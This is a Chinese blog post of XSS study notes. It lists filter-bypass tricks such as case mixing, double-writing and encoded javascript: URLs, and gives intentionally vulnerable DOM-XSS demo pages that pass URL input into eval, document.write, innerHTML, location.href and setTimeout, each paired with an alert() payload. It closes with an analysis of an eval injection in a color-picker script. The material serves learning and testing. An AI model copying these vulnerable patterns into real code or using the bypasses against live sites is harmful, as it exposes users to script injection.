内容简介:地址:参考wp:小记:
参考wp: https://xz.aliyun.com/t/1206
小记:
-
<input>标签里面可触发alert的事件oninput和onchange -
<a>href的javascript<a href="javascript:alert(/1/)">axxx</a>
-
有waf过滤时,多查看源码,看看payload发生了什么变化
常用绕过方式 双写绕过 大小写绕过
-
协议绕过
-
Javascript:伪协议后面可以使用URL编码。 如:<a href="javas%09cript:alert(1)">click me</a>可成功执行弹窗。 可用img就不行:<img src=1 onerror="javas%09cript:alert(1)"> 因为href属性会跳转到其中的URL,而会进行URL解码,onerror属性只会执行JS,不跳转同时后面的url编码可以再做一次entity(HTML实体)编码: %09 --> TAB %0d --> 回车 %0a --> 空格
html标签不区分大小写,但是javascript区分大小写
<iMg sRc=x onError=alert(1)> 弹窗 <iMg sRc=x onError=aLert(1)> 不弹窗
-
referer和User-Agent和xff cookie等也可能造成XSS(当这些信息会输出到页面时)
-
angularjs的ng-include 加载外面html导致的XSS
?src='level1.php?name=test<img src=1 onerror=alert(1)>'
-
flash xss
flash xss可使用JPEXS 对下载的flash进行逆向分析,找到关键函数
Flash xss检测脚本的简单实现 https://www.freebuf.com/sectool/108568.html
dom-xss
一个简单的demo
test.html
<html>
<head>
<meta charset="utf-8">
<title>XSSdemo</title>
</head>
<script>
eval(location.hash.substr(1));
</script>
<body>
test
</body>
</html>
payload
xxxxx/test.html#alert(1);
分析
location.hash.substr(1)
提取出来的是
alert(1)
eval执行了alert(1),从而引发了xss
几种常见的dom型xss
使用document.write直接输出导致浏览器解析恶意代码
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title></title>
<script type="text/javascript">
var s=location.search; //返回URL中的查询部分(?之后的内容)
s=s.substring(1,s.length); //返回整个查询内容
var url=""; //定义变量url
if(s.indexOf("url=")>-1){ //判断URL是否为空
var pos=s.indexOf("url=")+4; //过滤掉"url="字符
url=s.substring(pos,s.length); //得到地址栏里的url参数
}else{
url="url参数为空";
}
document.write("url: <a href='"+url+"'>"+url+"</a>"); //输出
</script>
</head>
<body>
</body>
</html>
payload
xxx/test.html?url=javascript:alert(1)
使用innerHTML直接输出导致浏览器解析恶意代码
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title></title>
<script type="text/javascript">
var s=location.search; //返回URL中的查询部分(?之后的内容)
s=s.substring(1,s.length); //返回整个查询内容
var url=""; //定义变量url
if(s.indexOf("url=")>-1){ //判断URL是否为空
var pos=s.indexOf("url=")+4; //过滤掉"url="字符
url=s.substring(pos,s.length); //得到地址栏里的url参数
}else{
url="url参数为空";
}
</script>
</head>
<body>
<span id='test'><a href=""></a></span>
<script type="text/javascript">document.getElementById("test").innerHTML="我的url是: <a href='"+url+"'>"+url+"</a>"; </script>
</body>
</html>
payload
xxx/test.html?url=javascript:alert(1)
使用location/location.href/location.replace/iframe.src造成的XSS
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title></title>
<script type="text/javascript">
var s=location.search; //返回URL中的查询部分(?之后的内容)
s=s.substring(1,s.length); //返回整个查询内容
var url=""; //定义变量url
if(s.indexOf("url=")>-1){ //判断URL是否为空
var pos=s.indexOf("url=")+4; //过滤掉"url="字符
url=s.substring(pos,s.length); //得到地址栏里的url参数
// }else{ //此处注释掉
// url="url参数为空"; //此处注释掉
}
</script>
</head>
<body>
<span id='test'><a href=""></a></span>
<script type="text/javascript">location.href=url</script>
</body>
</html>
使用setTimeout/setInterval造成的XSS
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title></title>
<script type="text/javascript">
var s=location.search; //返回URL中的查询部分(?之后的内容)
s=s.substring(1,s.length); //返回整个查询内容
var url=""; //定义变量url
if(s.indexOf("url=")>-1){ //判断URL是否为空
var pos=s.indexOf("url=")+4; //过滤掉"url="字符
url=s.substring(pos,s.length); //得到地址栏里的url参数
}else{
url="url参数为空";
}
</script>
</head>
<body>
<textarea id="test" rows="8" cols="40">2s获取url</textarea>
<script type="text/javascript">
function showURL(url){
document.getElementById('test').value=url;
}
if(url!="url参数为空")
setTimeout("showURL('"+url+"')",2000);
//setInterval("showURL('"+url+"')",3000);
</script>
</body>
</html>
payload
test.html?url=aa');alert('xsstest');eval('
setTimeout变成
setTimeout(“showURL(‘“‘);alert(‘xsstest’);eval(‘+url+”‘)”,2000);
火狐下会自动对参数传输进行url编码
导致xss失败
输出为aa%27);alert(%27xsstest%27);eval(%27
edge下有效
dom-xss实例
色块XSS
test.htm
<script type="text/javascript">
varname = location.search.substr(1);
var varnames = varname.split('|');
varname = varnames[0];
varnamev = varnames[1];
fun = varnames[2] || '';
var colors = '\
000000#000000#000033#000066#000099#0000CC#0000FF#003300#003333#003366#003399#0033CC#0033FF#006600#006633#006666#006699#0066CC#0066FF#\
333333#009900#009933#009966#009999#0099CC#0099FF#00CC00#00CC33#00CC66#00CC99#00CCCC#00CCFF#00FF00#00FF33#00FF66#00FF99#00FFCC#00FFFF#\
666666#330000#330033#330066#330099#3300CC#3300FF#333300#333333#333366#333399#3333CC#3333FF#336600#336633#336666#336699#3366CC#3366FF#\
999999#339900#339933#339966#339999#3399CC#3399FF#33CC00#33CC33#33CC66#33CC99#33CCCC#33CCFF#33FF00#33FF33#33FF66#33FF99#33FFCC#33FFFF#\
CCCCCC#660000#660033#660066#660099#6600CC#6600FF#663300#663333#663366#663399#6633CC#6633FF#666600#666633#666666#666699#6666CC#6666FF#\
FFFFFF#669900#669933#669966#669999#6699CC#6699FF#66CC00#66CC33#66CC66#66CC99#66CCCC#66CCFF#66FF00#66FF33#66FF66#66FF99#66FFCC#66FFFF#\
FF0000#990000#990033#990066#990099#9900CC#9900FF#993300#993333#993366#993399#9933CC#9933FF#996600#996633#996666#996699#9966CC#9966FF#\
00FF00#999900#999933#999966#999999#9999CC#9999FF#99CC00#99CC33#99CC66#99CC99#99CCCC#99CCFF#99FF00#99FF33#99FF66#99FF99#99FFCC#99FFFF#\
0000FF#CC0000#CC0033#CC0066#CC0099#CC00CC#CC00FF#CC3300#CC3333#CC3366#CC3399#CC33CC#CC33FF#CC6600#CC6633#CC6666#CC6699#CC66CC#CC66FF#\
FFFF00#CC9900#CC9933#CC9966#CC9999#CC99CC#CC99FF#CCCC00#CCCC33#CCCC66#CCCC99#CCCCCC#CCCCFF#CCFF00#CCFF33#CCFF66#CCFF99#CCFFCC#CCFFFF#\
00FFFF#FF0000#FF0033#FF0066#FF0099#FF00CC#FF00FF#FF3300#FF3333#FF3366#FF3399#FF33CC#FF33FF#FF6600#FF6633#FF6666#FF6699#FF66CC#FF66FF#\
FF00FF#FF9900#FF9933#FF9966#FF9999#FF99CC#FF99FF#FFCC00#FFCC33#FFCC66#FFCC99#FFCCCC#FFCCFF#FFFF00#FFFF33#FFFF66#FFFF99#FFFFCC#FFFFFF';
var colorarray = colors.split('#');
var setv = '';
function showcolors() {
var s = '';
for(c in colorarray) {
s += '<em onmouseover="v(\'' + colorarray[c] + '\')" style="background-color:#' + colorarray[c] + '"></em>';
}
document.getElementById('colors').innerHTML = s;
}
function setvalue(obj) {
if(varname) {
parent.$(varname).style.backgroundColor = setv;
}
if(varnamev) {
parent.$(varnamev).value = setv;
}
if(fun) eval('parent.'+fun+'("'+setv+'")');
}
function v(v) {
v = v != 'transparent' ? '#' + v : 'transparent';
document.getElementById('p').style.backgroundColor = v;
setv = v;
document.getElementById('pv').innerHTML = v;
}
</script>
<style>
body { margin:0px;background-color:#333; }
#h { padding:0;width:210px;height:15px;background-color:#CCC;overflow:hidden;}
#p { margin:0;display:block;float:left;font-size:0;width:140px;height:13px;background:#DDF0DF; }
#pv { margin:0;display:block;float:left;font-size:12px;width:58px;height:13px;overflow:hidden;text-align: right;font-style:normal;background:#DDF0DF; }
#colors { clear:both;width:209px; height:133px; }
#colors em, .trans { font-size:0;margin:1px 0 0 1px;width:10px;height:10px;float:left;cursor:pointer; }
.trans { background-color: #FFF; }
</style>
<body onmousedown="setvalue(document.getElementById('colorhex'))" scrolling="no">
<div id="h"><em id="p"></em><em id="pv"></em><em class="trans" onmouseover="v('transparent')" style="background-image:url('transcolor.gif')"></em></div>
<div id="colors"></div>
<script type="text/javascript">
showcolors();
try {document.getElementById('box').style.backgroundColor = cvalue;} catch(e) {}
</script>
</body>
payload
test.htm?||alert(/xss/)
这里是由于fun变量没有过滤导致的
fun = varnames[2] || ''; 这里fun等于alert(/xss/)
eval函数执行 parent.alert(/xss/) 触发xss
if(fun) eval('parent.'+fun+'("'+setv+'")');
}
以上所述就是小编给大家介绍的《XSS学习小记》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Ajax for Web Application Developers
Kris Hadlock / Sams / 2006-10-30 / GBP 32.99
Book Description Reusable components and patterns for Ajax-driven applications Ajax is one of the latest and greatest ways to improve users’ online experience and create new and innovative web f......一起来看看 《Ajax for Web Application Developers》 这本书的介绍吧!
